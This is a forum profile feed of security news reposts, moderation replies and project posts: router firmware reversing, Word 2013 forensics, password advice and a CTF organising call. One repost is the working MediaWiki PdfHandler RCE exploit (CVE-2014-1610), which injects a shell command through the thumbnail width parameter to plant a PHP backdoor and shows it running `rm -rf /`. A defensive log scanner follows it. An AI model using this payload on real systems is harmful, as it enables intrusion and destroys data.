Posts: 18785
Days Won: 738
Everything posted by Nytro
-
All of these topics are "Help" topics. You already have a category for that. When I see 2-3 articles posted by you on this subject, rather than your own problems for which you are waiting on a solution, I will consider this suggestion.
-
Show me 5 posts you have made on this subject.
-
Post the link.
-
The quantum internet: the first teleportation of data into quantum storage over optical fibre
Published by Andrei Avădănei

A European team of physicists has demonstrated how a device can teleport quantum information into solid-state quantum (SSQ) storage over a telecom fibre, a crucial capability for the future of the quantum internet.

What does quantum teleportation mean? Quantum teleportation is the ability to transmit something from one location to another without crossing the space between the two. The matter itself does not make the journey, only the information that describes it. That information is transmitted to a new body, which takes on the identity of the original.

Full article: Internetul cuantic – prima teleportare a datelor într-un spațiu de stocare cuantic prin fibră optică | WORLDIT
-
Samsung could record everything you do with your mobile phone and share the data with software developers
Aurelian Mihai - 11 Feb 2014

Future generations of Samsung tablets and phones could include a monitoring feature that records in great detail how the Android devices are used. Known by the name Context, the monitoring service, resident in the memory of Samsung's Android devices, will permanently track how the installed applications are used and the data provided by the phone's sensors. Additionally, information about users' preferences will be collected by recording the words typed on the screen. Samsung could then make the collected information available to Android application developers, with the goal of helping them make improvements that better meet users' needs.

Of course, the Context service will also play a role in increasing advertising revenue, tailoring the ads shown to users' interests. For example, after a search for cooking recipes we could be bombarded with ads for restaurants that serve the dish ready-made.

According to rumours, the introduction of the Context service has been temporarily postponed after a closer analysis raised fears about the negative effects the measure could have on sales of Samsung phones.

Via: Theverge.com
Source: Samsung ar putea înregistra tot ce faci cu telefonul mobil și împărți datele cu dezvoltatorii software
-
https://www.youtube.com/watch?v=fvxqnQmahTA
-
Delete your Yahoo cookies and try again.
-
I will take part both in developing the PHP script and in creating the challenges. I can't help with the design.
-
Hi,

Following a suggestion, I have decided it would be a good idea to have our own CTF (Capture The Flag) portal. For those who don't know the term, a CTF is a competition in which participants have to solve as many problems as possible and receive points according to their difficulty. The areas the problems can cover are very varied: hacking, steganography, cryptography, programming, algorithms and many others.

To develop this project we need people able to:
1. develop such problems (preferably people who have taken part in such competitions, and Hertz)
2. develop a well-structured, OOP PHP/MySQL script for managing users and challenges (with experience)
3. design this portal (Javascript/jQuery, CSS3, HTML5)

Those able to contribute to this project are asked to PM me or post here. We would also like to offer prizes to those who finish in the top places at the end of the competition (there will be a deadline). On this occasion, anyone able to donate money, licences or services is asked to PM me.

In a few days, depending on the number of people interested, we will set things in motion. I'm waiting for PMs, or post here (preferably) if you can help.
-
Don't come complaining that you got ripped off, because you'll get a ban. Minimum 50 posts for this kind of business.
-
Where's the anonymity if the person you're talking to knows your IP?
-
Yes, I know, RC4 has SOME problems, which is why I said whoever "breaks" it gets VIP. A shame it's hardly used any more.
-
RSA 4096 + AES 256 GCM. I trust RSA more than elliptic curves.

How it works:
1. Client -> Server (handshake, server certificate validation, client certificate validation)
2. Server -> Client 2 (the same)
3. Client -> Client 2 (the server acts only as a router. A handshake is done and certificate checks are performed on the clients)

The server will have a CA against which its certificate will be verified. Each user will generate their own CA and, somehow, will give it to the user they want to communicate with. Certificate validation will be done against that certificate.

ps-axl, what will you be working on?

PS: Paid certificates, signed by a root CA, are an option. That way a user who has a site, www.vasile.com, gets a certificate for that site and the certificate is then validated against the root CA that signed it. In this case the root CA is public and "distributing" it is much simpler.

PS2: I'm waiting for whoever said SSL can be broken to give me a demo with RC4 with a 56-bit key and I'll be satisfied; they get VIP. If they give me a demo with AES 128-bit and RSA 1024-bit they get Administrator.
-
Finally a good idea. Hertz, what do you think?
-
Hacking and patching TP-LINK TD-W8901G router
By piotrbania.com / 31.01.2014

Motivation

Recently a critical vulnerability has been found in TP-LINK routers and a few other router devices. This particular vulnerability to which I am referring was described here. Basically it is the so-called ROM-0 attack. In short, an attacker, by requesting ROM-0 through an HTTP request (i.e. http://192.168.1.1/ROM-0), can download all the important and secret data stored in your router. This includes your ADSL login/password combination, WIFI password and basically all of your configuration data. Actually I was a bit pissed at TP-LINK for this crap so I decided to patch the vulnerability by myself.

DISCLAIMER: The author takes no responsibility for any actions taken with the provided information or code. You are doing everything on your own responsibility.

The list of vulnerable devices is presented below:
TD-W8901G
TD-8816
TD-W8951ND
TD-W8961ND
D-Link DSL-2640R ADSL Modem
AirLive WT-2000ARM
Pentagram Cerberus P 6331-42
ZTE ZXV10 W300

I had one of those devices (TD-W8901G) and I took this as a good fortune sign to start playing with hardware router hacking. My task was to patch this vulnerability and make the ROM-0 not downloadable. This was pretty much my first encounter with this type of stuff (and my first encounter with MIPS really). At this point I would like to thank hackerfantastic and robercik for some hardware hints.

Serial connection

Most routers (or embedded devices in general) have some sort of communication port designed to aid the manufacturers with testing and debugging of the target device. This communication port is usually SERIAL (UART/RS232) or JTAG (EJTAG). In my case I was unable to find the JTAG (EJTAG) port but I found the serial port instead (presented on the images below). First of all, this is some ugly-ass soldering work (yes, I did that).

Ok, now getting back to my initial point: I used a PL2303 RS232<>USB converter to connect the serial port to the USB port of my computer. Putty is pretty decent for handling normal serial communication so I used it as my default client (configuration: 115200/8/1/N). I was expecting to see some output in my putty but unfortunately I got nothing. So after some digging around and harassing a few friends (ohayo!) I found out that my voltage levels on the RX and TX pins were too low (they should be 3.3V). After some further digging and looking at the schematics of this board it became obvious that two resistors were missing (see image above). So I took a piece of wire and connected the empty pins together (in two places, obviously). Now the voltage levels were correct and I was able to see the output in my terminal.

Full article: PIOTRBANIA.COM :: Hacking and patching TP-LINK TD-W8901G router
-
[h=3]The registration marathon is now live![/h] https://olympic-ctf.ru/register
-
Mobile Pwn2Own Autumn 2013 Chrome on Android Exploit Writeup
ianbeer@chromium.org

tl;dr: Pinkie Pie exploited an integer overflow in V8 when allocating TypedArrays, abusing dlmalloc inline metadata and JIT rwx memory to get reliable code execution. Pinkie then exploited a bug in a Clipboard IPC message where a renderer-supplied pointer was freed to get code execution in the browser process by spraying multiple gigabytes of shared memory.

Download: https://docs.google.com/document/d/1tHElG04AJR5OR2Ex-m_Jsmc8S5fAbRB3s4RmTG_PFnw/edit
-
MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
From: Pichaya Morimoto <pichaya () ieee org>
Date: Sat, 1 Feb 2014 22:28:51 +0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

####################################################################
#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#
####################################################################

# Exploit:
####################################################################

1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
   http://vulnerable-site/index.php/Special:Upload

2. inject os cmd to upload a php-backdoor
   http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20"<?php%20system(\\$_GET[1]);">images/xnz.php`

3. access to php-backdoor!
   http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root

4. happy pwning!!

# Related files:
####################################################################
thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
includes/filerepo/file/File.php

# Vulnerability Analysis:
####################################################################

1. thumb.php
This script is used to resize images if it is configured to be done when the web browser requests the image

<?
...
1.1 Called directly, use $_GET params
wfThumbHandleRequest();

1.2 Handle a thumbnail request via query parameters
function wfThumbHandleRequest() {
    $params = get_magic_quotes_gpc() ? array_map( 'stripslashes', $_GET ) : $_GET;
    wfStreamThumb( $params ); // stream the thumbnail
}

1.3 Stream a thumbnail specified by parameters
function wfStreamThumb( array $params ) {
    ...
    $fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts uploaded.pdf file here
    ...
    // Backwards compatibility parameters
    if ( isset( $params['w'] ) ) {
        $params['width'] = $params['w']; // << Inject os cmd here!
        unset( $params['w'] );
    }
    ...
    $img = wfLocalFile( $fileName );
    ...
    // Thumbnail isn't already there, so create the new thumbnail...
    $thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image by width/height
    ...
    // Stream the file if there were no errors
    $thumb->streamFile( $headers );
    ...
?>

2. /includes/filerepo/file/File.php
<?
...
function transform( $params, $flags = 0 ) {
    ...
    $handler = $this->getHandler(); // << PDF Handler
    ...
    $normalisedParams = $params;
    $handler->normaliseParams( $this, $normalisedParams );
    ...
    $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
    ..
?>

3. /extensions/PdfHandler/PdfHandler_body.php
<?
...
function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
    ...
    $width = $params['width'];
    ...
    $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & parameters
    $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}";
    $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg( $srcPath );
    $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );
    $cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell argument
    $cmd .= wfEscapeShellArg( $dstPath ) . ")";
    $cmd .= " 2>&1";
    ...
    $err = wfShellExec( $cmd, $retval );
    ...
?>

4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
<?
...
function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = array() ) {
    ...
    passthru( $cmd, $retval ); // << Execute here!!

POC:

GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\$_GET[1]);%22%3Eimages/longcat.php` HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=op3h2huvddnmg7gji0pscfsg02

<html><head><title>Error generating thumbnail</title></head>
<body>
<h1>Error generating thumbnail</h1>
<p>
?????????????????????????????: /bin/bash: -: command not found<br />
convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.<br />
GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />
</p>
</body>
</html>

GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1

uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Back-end $cmd
####################################################################
GlobalFunctions.php : wfShellExec()
cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|`echo "<?php system(\\$_GET[1]);">images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1

Source: Full Disclosure: MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
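A defender-side check for the thumb.php pattern above, as an added example (not code from the advisory or from MediaWiki): it scans constructed access-log lines for thumb.php requests whose w/width/h/height values are not a plain pixel size, since that is exactly what an unescaped `-resize {$width}` would hand to the shell. The log lines and IP addresses are constructed samples.

```python
"""Flag thumb.php size parameters that could not be a legitimate pixel size.

Added example for the CVE-2014-1610 write-up above; not code from the
advisory or from MediaWiki. The log lines below are constructed samples in
Apache combined format. The only values PdfHandler should ever interpolate
into `-resize {$width}` are integers (or WxH), so anything else is either a
malformed request or an injection attempt worth alerting on.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Combined log format: host ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Query parameters that thumb.php / PdfHandler turn into convert arguments
SIZE_PARAMS = {"w", "width", "h", "height"}

# A genuine size: 1-5 digits, optionally "px" or a WxH pair
SAFE_SIZE_RE = re.compile(r"^\d{1,5}(?:px|x\d{1,5})?$")

# Characters that end or chain a shell command inside an unquoted argument
SHELL_META = set("|;&`$<>(){}\n\r")


def query_params(query):
    """Split a raw query string, decoding each value twice so double-encoded
    payloads (%257C -> %7C -> |) are inspected in their final form."""
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        yield unquote_plus(key), unquote_plus(unquote_plus(value))


def classify_size(value):
    """None for a legitimate size, otherwise a short reason string."""
    if SAFE_SIZE_RE.match(value):
        return None
    if SHELL_META & set(value):
        return "shell-metacharacter"
    return "malformed"


def inspect_request(path):
    """Return [(param, decoded_value, reason)] for a thumb.php request path."""
    parts = urlsplit(path)
    if not parts.path.endswith("/thumb.php"):
        return []
    findings = []
    for key, value in query_params(parts.query):
        if key in SIZE_PARAMS:
            reason = classify_size(value)
            if reason:
                findings.append((key, value, reason))
    return findings


def scan_log(lines):
    """Return [(ip, param, decoded_value, reason)] over an iterable of log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for param, value, reason in inspect_request(m.group("path")):
            hits.append((m.group("ip"), param, value, reason))
    return hits


# Constructed sample log; lines 1 and 4 mimic the advisory's request shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2014:22:28:51 +0700] "GET /wiki/thumb.php?f=Longcat.pdf&w=10|%60id%60 HTTP/1.1" 500 612',
    '10.0.0.7 - - [01/Feb/2014:22:30:02 +0700] "GET /wiki/thumb.php?f=Report.pdf&w=120 HTTP/1.1" 200 8190',
    '10.0.0.7 - - [01/Feb/2014:22:30:05 +0700] "GET /wiki/index.php?title=Main_Page HTTP/1.1" 200 20311',
    '10.0.0.9 - - [01/Feb/2014:22:41:17 +0700] "GET /wiki/thumb.php?f=Longcat.pdf&width=10%257Cid HTTP/1.1" 500 612',
    '10.0.0.7 - - [01/Feb/2014:22:45:30 +0700] "GET /wiki/thumb.php?f=Report.pdf&w=800x600&p=2 HTTP/1.1" 200 8190',
    '10.0.0.9 - - [01/Feb/2014:22:50:00 +0700] "GET /wiki/thumb.php?f=Report.pdf&w=abc HTTP/1.1" 400 301',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious thumb.php request: ip=%s %s=%r (%s)" % hit)
```

The same `classify_size` rule is the input validation the vulnerable `doTransform` lacked: only a value that passes it should ever reach the command line.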
-
[h=3]MS Word 2013 Reading Locations[/h]
Microsoft Office 2013 introduced a new feature that allows a user to continue reading or editing a document starting at the last point he or she was working. This feature, referred to by some as "pick up where you left off", is a convenient way to jump to the location within a document that Word believes was being read or edited most recently before a file was closed.

After opening a document and being greeted with the prompt pictured above, I was curious as to where this information is being tracked. After a bit of investigation, I located a set of registry subkeys specific to Office 2013 where this information is stored. When a document in Word 2013 is closed, a registry subkey is created or updated in the "Software\Microsoft\Office\15.0\Word\Reading Locations" subkey of the current user's NTUSER.DAT. The subkey created should be named something similar to "Document 0", "Document 1", "Document 2", etc., as the number appended to the name of each subkey is incremented by one when a new document is closed. Each "Document #" subkey should contain 3 values that may be of interest to an examiner: "Datetime", "File Path", and "Position". All three values are stored as null-terminated Unicode strings.

Screenshot of Reading Locations Subkey

Datetime Value
The Datetime value corresponds to the local date and time the file was last closed. This value data is displayed in the format YYYY-MM-DD, followed by a "T", then HH:MM.

File Path Value
The File Path value is the fully qualified file name.

Position Value
The Position value appears to store the positioning data used to place the cursor at the point in the document "where you left off". It appears that the second number in this value data is used to denote the location within the document. For example, if a file is opened for the first time and then closed again without scrolling down through the document, the Position value data should be "0 0". If a file is opened and the user scrolls down a bit through the document before closing it, the Position value data may be something like "0 1500". The second number in this value data appears to increase as the user scrolls through (i.e. reads/edits) the document. Note that positioning of the cursor does not seem to have an impact on this value. That is, the second field in this value data increases even if the cursor is never moved from the beginning of the document.

[h=4]Forensic Implications[/h]
Fifty unique files (based on fully qualified file name) can be tracked in the Reading Locations subkeys. Each time a document in Word 2013 is closed, regardless of the version of Word that created the file, a Reading Locations subkey should be added or updated. It should be noted, however, that files accessed from a user's SkyDrive do not appear to be tracked in the Reading Locations subkey. If the file referenced by the "File Path" value data of any subkey is opened and closed again, the corresponding value data is updated; however, the organization of the "Document #" subkeys remains unchanged (i.e. "Document 0" is not shifted to "Document 1", etc.). Interestingly, it appears that when the 51st document is opened, the "Document 49" subkey is overwritten, leaving data from the other subkeys untouched. This LIFO rotation may have some interesting effects on examination, as it lends itself to preserving more historical data while recent activity is more likely to be overwritten.

Posted by Jason Hale at 11:51 PM
Source: Digital Forensics Stream: MS Word 2013 Reading Locations
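To turn the raw values described above into an examiner's timeline, here is an added example (not code from the Digital Forensics Stream post). The subkey data is constructed in the code as null-terminated UTF-16-LE strings, as the post describes them, and the sort by Datetime shows why the "Document #" slot number must not be read as a chronological order.

```python
"""Parse Word 2013 "Reading Locations" subkeys into a timeline.

Added example, not from the Digital Forensics Stream post. Each "Document N"
subkey holds three null-terminated Unicode (UTF-16-LE) strings: Datetime
(local time, YYYY-MM-DDTHH:MM), File Path, and Position ("A B", where the
second number grows as the user scrolls). The sample registry data below is
constructed; real data would come from an exported NTUSER.DAT hive.
"""
from datetime import datetime

READING_LOCATIONS = r"Software\Microsoft\Office\15.0\Word\Reading Locations"


def reg_sz(value):
    """Encode a string the way the hive stores it: UTF-16-LE plus a null terminator."""
    return value.encode("utf-16-le") + b"\x00\x00"


def decode_reg_sz(raw):
    """Decode a null-terminated UTF-16-LE value, stopping at the first terminator."""
    text = raw.decode("utf-16-le", errors="replace")
    end = text.find("\x00")
    return text if end < 0 else text[:end]


def parse_position(text):
    """'0 1500' -> (0, 1500); the second field is the scroll/read position."""
    first, second = text.split()
    return int(first), int(second)


def parse_subkey(name, values):
    """Build one record from a 'Document N' subkey's raw values."""
    slot = int(name.split()[1])
    closed = datetime.strptime(decode_reg_sz(values["Datetime"]), "%Y-%m-%dT%H:%M")
    path = decode_reg_sz(values["File Path"])
    pos = parse_position(decode_reg_sz(values["Position"]))
    return {
        "slot": slot,
        "closed": closed,
        "path": path,
        "position": pos,
        # "0 0" means the file was opened and closed without scrolling
        "scrolled": pos[1] > 0,
    }


def build_timeline(subkeys):
    """Records sorted newest-first by Datetime, not by slot number."""
    records = [parse_subkey(name, vals) for name, vals in subkeys.items()]
    return sorted(records, key=lambda r: r["closed"], reverse=True)


# Constructed hive contents: slot 49 is the newest because, per the post, the
# 51st document overwrites "Document 49" instead of shifting the other slots.
SAMPLE_SUBKEYS = {
    "Document 0": {
        "Datetime": reg_sz("2014-01-15T09:12"),
        "File Path": reg_sz(r"C:\Users\jdoe\Documents\budget.docx"),
        "Position": reg_sz("0 1500"),
    },
    "Document 1": {
        "Datetime": reg_sz("2014-01-30T17:45"),
        "File Path": reg_sz(r"C:\Users\jdoe\Downloads\invoice.doc"),
        "Position": reg_sz("0 0"),
    },
    "Document 49": {
        "Datetime": reg_sz("2014-02-03T23:51"),
        "File Path": reg_sz(r"\\fileserver\share\contract.docx"),
        "Position": reg_sz("0 4210"),
    },
}

if __name__ == "__main__":
    print("Source key: HKCU\\" + READING_LOCATIONS)
    for r in build_timeline(SAMPLE_SUBKEYS):
        print(r["closed"].isoformat(), "slot", r["slot"], r["path"], r["position"])
```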
-
Yahoo Hacked And How To Protect Your Passwords
James Lyne, Contributor

Yahoo yesterday announced that Yahoo mail has been the focus of a co-ordinated hack and that at this time it has confirmed a number of users' e-mail accounts have been compromised – you may be one of them (and if you are, see below for my top tips on how to secure your passwords going forward). It is not clear how many users have been compromised, or exactly how. Yahoo don’t have a history of providing much information, but it would be prudent for any Yahoo mail users to take precautions (more on that below). Between the vague statements about malicious code and “a third party was probably to blame”, Yahoo has been resetting the credentials of affected users via e-mail and SMS if your mobile is on file.

Whilst details are scarce at this time, this continues a trend of bad security and resilience news for Yahoo, who experienced a multitude of issues in 2013. The company made clear in their announcement that a third party database with shared credentials was likely the source and that they had no evidence the usernames and passwords were taken directly from their systems. Whether the third party was one they provided data to, or whether it was a random third party with shared credentials, is not particularly clear. There is insufficient detail to lay blame at this time, but certainly it would be prudent to take steps to secure yourself.

More broadly, the last couple of years have seen a significant spike in the theft of passwords (or their hashed or encrypted representations) from online services as cyber criminals moved beyond financial information as their sole form of profit. Whilst we all wait with bated breath for further details of the compromise, now would be a very good time to upgrade your password. Many providers are very behind the times on password security, but at least you can take steps to minimise the risks. Here are a few tips on how to do it:

1. Avoid using the same password across multiple sites and services. That way, if Yahoo credentials are breached, hackers won’t be able to jump across into your Twitter, online banking, work accounts or the like. I know this presents a memory challenge for some users, but see the tip below on password managers.

2. Choose a password which is not easy to guess. Words with a dictionary root followed by numerals are very common choices and predictable patterns that cyber criminals can use to crack your password very fast. Passwords should be long, phrase based and involve a balance of different types of characters – numbers, letters, capitals and ideally a few symbols. See my fabulous example below.

3. Set up password change/reset mechanisms properly – not obviously. Password reset forms on many services ask questions like “Where did you go to school?” or “In which year were you born?”. These questions are easy to answer and can typically be mined from social media pages or the Internet — why would hackers guess your password if they can just tell a system where you went to school and how old you are (you did, after all, announce your birthday last year on Twitter, and your age, didn’t you?). Instead I suggest lying on the Internet. Come up with a scheme of answers to these questions that you won’t forget (or store securely) or, better still, if the service allows, specify your own difficult questions.

4. Bigger = better! When passwords are stolen from providers they are typically in a hashed or encrypted form, a bit like this: '5f4dcc3b5aa765d61d8327deb882cf99'. This is a hashed password representation, and using clever techniques and computing power attackers can reverse the original password and log in to your account. When they steal these hashes it is only a matter of time and effort until they reveal the original. Short passwords might be guessed in seconds to minutes or hours (it depends on the implementation), where very long passwords could take years of work (and the cyber criminals are likely to go after someone else). Therefore making your password 60 characters makes life much harder for the cyber criminals if they do manage to break into a service like Yahoo. This of course all assumes the provider isn’t just storing your password in clear text – in which case you will be very glad of tip number 1!

5. Use a password manager. Password managers generate strong unique passwords for each of your services and then store them in an encrypted database which you can unlock with one good master password. It is a reasonable compromise for those that do not have an amazing memory but don’t want to fall into the pitfall of repeating similar passwords across multiple sites. See below for more information on how this works.

6. Register with a breach monitoring service. There are a variety of services on the Internet now which monitor for visible lists of stolen usernames/passwords. Of course, not all breaches are visible, so it is far from a complete list. That said, if your username shows up it will e-mail you a notification and tell you it is time to change.

Despite numerous proposals of authentication mechanisms to replace the password, it is still the cheapest, easiest to deploy, ubiquitous form of authentication used. So we should all take some steps to make sure we are using them properly. A good password manager allows you to generate secure passwords for each of your sites and avoid duplication — luckily you don’t have to type these beastly long passwords out, the tools do that for you. Here is an example of a password recipe for a new password:

A password recipe for a new password courtesy of 1Password for Mac OS X

You can specify the length of the password (some providers don’t allow unlimited length but arbitrarily restrict you to, say, 16 characters, e.g. Microsoft 365 Exchange. Grumble grumble.) and the make-up of symbols and numbers. You can even make it pronounceable for a situation where you might have to actually read the password out (though I don’t recommend this for obvious reasons). Each time you click the button you get a nice new secure password which the password manager automatically associates with the website in question, so that you can auto log in each time remembering just one secure password you specify. Not all password managers are created equal so it is worth shopping around a little before you commit, but these tools can take the average user's password security from poor to really rather good in an afternoon password-changing party.

Lastly, it is important you keep a backup of the encrypted password database (losing all your passwords in one place would be painful) and you may want to think twice about putting the keys to your whole life in there – my banking details, for example, would not be in this application. So why not make something good from another password breach and share these tips with your friends, family and colleagues. I await with bated breath news from a reader that they’ve successfully made all their passwords over 128 characters.

Source: Yahoo Hacked And How To Protect Your Passwords - Forbes
-
XSS and MySQL FILE
Difficulty: Beginner

Details
This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies, then how you can use his/her session to gain access to the administration interface, find a SQL injection and gain code execution using it.

What you will learn
Cross-Site Scripting exploitation
MySQL injection with FILE privilege

Requirements
A computer with virtualisation software
A basic understanding of HTTP
A basic understanding of PHP
Yes, that's it!

Download
xss_and_mysql_file.pdf (579K)
xss_and_mysql_file.iso (64-bit, 189M, MD5: e95459511a4aebb51d0de6cd04a016df)
xss_and_mysql_file_i386.iso (32-bit, 178M, MD5: c9c7a31ab9bf79b82b72b58bb0a3a657)

Source: https://pentesterlab.com/exercises/xss_and_mysql_file/
-
Reversing the WRT120N’s Firmware Obfuscation By Craig | February 2, 2014 It was recently brought to my attention that the firmware updates for the Linksys WRT120N were employing some unknown obfuscation. I thought this sounded interesting and decided to take a look. The latest firmware update for the WRT120N didn’t give me much to work with: Binwalk firmware update analysis As you can see, there is a small LZMA compressed block of data; this turned out to just be the HTML files for the router’s web interface. The majority of the firmware image is unidentified and very random. With nothing else to go on, curiosity got the best of me and I ordered one (truly, Amazon Prime is not the best thing to ever happen to my bank account). Hardware Analysis A first glance at the hardware showed that the WRT120N had a Atheros AR7240 SoC, a 2MB SPI flash chip, 32MB of RAM, and what appeared to be some serial and JTAG headers: WRT120N PCB Looking to get some more insight into the device’s boot process, I started with the serial port: UART Header I’ve talked about serial ports in detail elsewhere, so I won’t dwell on the methods used here. However, with a quick visual inspection and a multimeter it was easy to identify the serial port’s pinout as: Pin 2 – RX Pin 3 – TX Pin 5 – Ground The serial port runs at 115200 baud and provided some nice debug boot info: $ sudo miniterm.py /dev/ttyUSB0 115200 --- Miniterm on /dev/ttyUSB0: 115200,8,N,1 --- --- Quit: Ctrl+] | Menu: Ctrl+T | Help: Ctrl+T followed by Ctrl+H --- ======================================================================= Wireless Router WG7005G11-LF-88 Loader v0.03 build Feb 5 2009 15:59:08 Arcadyan Technology Corporation ======================================================================= flash MX25L1605D found. Copying boot params.....DONE Press Space Bar 3 times to enter command mode ... Flash Checking Passed. Unzipping firmware at 0x80002000 ... [ZIP 3] [ZIP 1] done In c_entry() function ... 
install_exception install exception handler ... install interrupt handler ... ulVal: 0x484fb Set GPIO #11 to OUTPUT Set GPIO #1 to OUTPUT Set GPIO #0 to OUTPUT Set GPIO #6 to INPUT Set GPIO #12 to INPUT Timer 0 is requested ##### _ftext = 0x80002000 ##### _fdata = 0x80447420 ##### __bss_start = 0x804D5B04 ##### end = 0x81869518 ##### Backup Data from 0x80447420 to 0x81871518~0x818FFBFC len 583396 ##### Backup Data completed ##### Backup Data verified [INIT] HardwareStartup .. [INIT] System Log Pool startup ... [INIT] MTinitialize .. CPU Clock 350000000 Hz init_US_counter : time1 = 270713 , time2 = 40272580, diff 40001867 US_counter = 70 cnt1 41254774 cnt2 41256561, diff 1787 Runtime code version: v1.0.04 System startup... [INIT] Memory COLOR 0, 1600000 bytes .. [INIT] Memory COLOR 1, 1048576 bytes .. [INIT] Memory COLOR 2, 2089200 bytes .. [INIT] tcpip_startup .. Data size: 1248266 e89754967e337d9f35e8290e231c9f92 Set flash memory layout to Boot Parameters found !!! Bootcode version: v0.03 Serial number: JUT00L602233 Hardware version: 01A ... The firmware looked to have been made by Arcadyan, and the ‘Unzipping firmware…’ message was particularly interesting; a bit of Googling turned up this post on reversing Arcadyan firmware obfuscation, though it appears to be different from the obfuscation used by the WRT120N. The only interaction with the serial port was via the bootloader menu. During bootup you can break into the bootloader menu (press the space bar three times when prompted) and perform a few actions, like erasing flash and setting board options: Press Space Bar 3 times to enter command mode ...123 Yes, Enter command mode ... [WG7005G11-LF-88 Boot]:? 
    ======================
    [U] Upload to Flash
    [E] Erase Flash
    [G] Run Runtime Code
    [A] Set MAC Address
    [#] Set Serial Number
    [V] Set Board Version
    [H] Set Options
    [P] Print Boot Params
    [I] Load ART From TFTP
    [1] Set SKU Number
    [2] Set PIN Number
    ======================

Unfortunately, the bootloader doesn't appear to provide any options for dumping the contents of RAM or flash. Although there is a JTAG header on the board, I opted for dumping the flash chip directly, since JTAG dumps tend to be slow and interfacing directly with SPI flash is trivial. Pretty much anything that can speak SPI can be used to read the flash chip; I used an FTDI C232HM cable and the spiflash.py utility included with libmpsse:

    $ sudo spiflash --read=flash.bin --size=$((0x200000)) --verify
    FT232H Future Technology Devices International, Ltd initialized at 15000000 hertz
    Reading 2097152 bytes starting at address 0x0...saved to flash.bin.
    Verifying...success.

The flash chip contains three LZMA compressed blocks and some MIPS code, but the main firmware image is still unknown:

(image: Flash analysis)

The first two blocks of LZMA compressed data are part of an alternate recovery image, and the MIPS code is the bootloader. Besides some footer data, the rest of the flash chip simply contains a verbatim copy of the firmware update file.

Bootloader Analysis

The bootloader, besides being responsible for de-obfuscating and loading the firmware image into memory, contains some interesting tidbits. I'll skip the boring parts in which I find the bootloader's load address, manually identify standard C functions, resolve jump table offsets, etc., and get to the good stuff.

First, very early in the boot process, the bootloader checks to see if the reset button has been pressed. If so, it starts up the "Tiny_ETCPIP_Kernel" image, which is the small LZMA-compressed recovery image, complete with a web interface:

(image: Unzipping Tiny Kernel)

This is nice to know; if you ever end up with a bad firmware update, holding the reset button during boot will allow you to un-brick your router.

There is also a hidden administrator mode in the bootloader's UART menu:

(image: Hidden bootloader menu)

Entering an option of ! will enable "administrator mode"; this unlocks a few other options, including the ability to read and write to memory:

    [WG7005G11-LF-88 Boot]:!
    Enter Administrator Mode !
    ======================
    [U] Upload to Flash
    [E] Erase Flash
    [G] Run Runtime Code
    [M] Upload to Memory
    [R] Read from Memory
    [W] Write to Memory
    [Y] Go to Memory
    [A] Set MAC Address
    [#] Set Serial Number
    [V] Set Board Version
    [H] Set Options
    [P] Print Boot Params
    [I] Load ART From TFTP
    [1] Set SKU Number
    [2] Set PIN Number
